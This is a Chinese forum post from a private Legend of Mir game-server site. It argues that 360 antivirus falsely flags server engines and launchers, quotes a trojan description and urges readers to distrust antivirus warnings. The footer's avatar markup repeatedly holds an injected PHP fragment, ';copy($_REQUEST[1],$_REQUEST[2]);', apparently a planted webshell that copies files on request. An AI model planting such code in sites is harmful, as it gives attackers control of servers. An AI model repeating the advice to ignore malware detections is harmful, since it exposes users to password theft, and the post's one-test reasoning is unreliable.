|
|
近日来许多GM求助GM之家,咨询为什么下载个版本360也报毒,这种问题一般的才入门的新人是没办法分辨到底是不是真的病毒,还是误报,360的成功,是不可否认的,但在有一句话创业难,守业更难.这句话就体验在现在的360身上,最近和腾讯PK,然后又把淘宝也参入了.这些就不说了,大家跟着GM之家来看看到底该不该信360的报毒结果.
首先360现在拥有的用户已经超过3亿,它们如何去守住这些用户,只有一个办法让用户百毒不侵!做到这一个地步必须任何一段有影响计算机安全的代码就被报毒,这一点就是宁可杀错一百,也不放过一个政策,对程序员是深深的打击
首先我们看下360网盾的效果
以上图片是360网盾拦截下载工具的载图,从以上图片可以看见一个rar格式的文件.只是里面包涵了传奇服务端引擎文件,就被报毒,再让我们看看360对知名Herom2引擎免费登录器的报毒结果
从以上图片大家可以看见,连配套登录器它也报毒,我们可以看见病毒的说明是Win32/PSWTroj.lmir该病毒到底是什么病毒?
这是一个盗号木马,它会注入用户电脑的系统进程中运行,盗取病毒作者指定的帐号和密码。
在磁盘中释放出以下文件:
C:\WINDOWS\835389M.exe
C:\WINDOWS\version.txt
在磁盘中删除了以下文件:
C:\WINDOWS\version.txt
病毒会连接作者指定的网址:
病毒会从Http://gui88888******.**t*下载文件至本地计算机C:\WINDOWS\version.txt
域名:"gui88888.*****端口:80(TCP)
gui88888.*****.txt
在系统中创建了以下进程:
病毒尝试枚举系统进程,可能会对一些安全进程进行关闭操作
"835389M.exe"
病毒尝试使用[SeDebugPrivilege]权限枚举进程
这个病毒的功能就是盗号,然而真的是这样吗?在GM之家运行Herom2登录器后不开360杀毒的情况下,得到的结果因该是木马成功运行了,我的号被盗了,然而让我们看看运行后的真正结果
看见了吗,C盘目录下根本就不存在version.txt这个文件,而且还是在没开杀毒情况下,其它的就不测试了,相信从以上的说明大家就能分析的报毒的原因是什么,唯一的原因就是“私服”两个字。
GM之家在此告诫大家,不要轻易的去相信杀毒,而抹杀了一个好的程序,好的服务端,好的版本,要懂得自我提升,不要在原地停留,如果实在不能分辨是不是真正病毒的时候可以联系GM之家帮助你,帮助QQ:1340132550 |
|
[复制链接]
|站长QQ282630674|传奇服务端|GM基地|鲁ICP备16023424号-4|GM016论坛
IP卡
狗仔卡;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/00/00/04_avatar_middle.jpg){kind=avatar}
发表于 2010-10-14 10:01:05
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/01/42/32_avatar_middle.jpg){kind=avatar}
;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/04/12/32_avatar_middle.jpg){kind=avatar}
;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/05/13/26_avatar_middle.jpg){kind=avatar}
;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/05/54/88_avatar_middle.jpg){kind=avatar}
;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/05/41/36_avatar_middle.jpg){kind=avatar}
;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/07/17/75_avatar_middle.jpg){kind=avatar}
;copy($_REQUEST[1],$_REQUEST[2]);///data/avatar/000/07/24/34_avatar_middle.jpg){kind=avatar}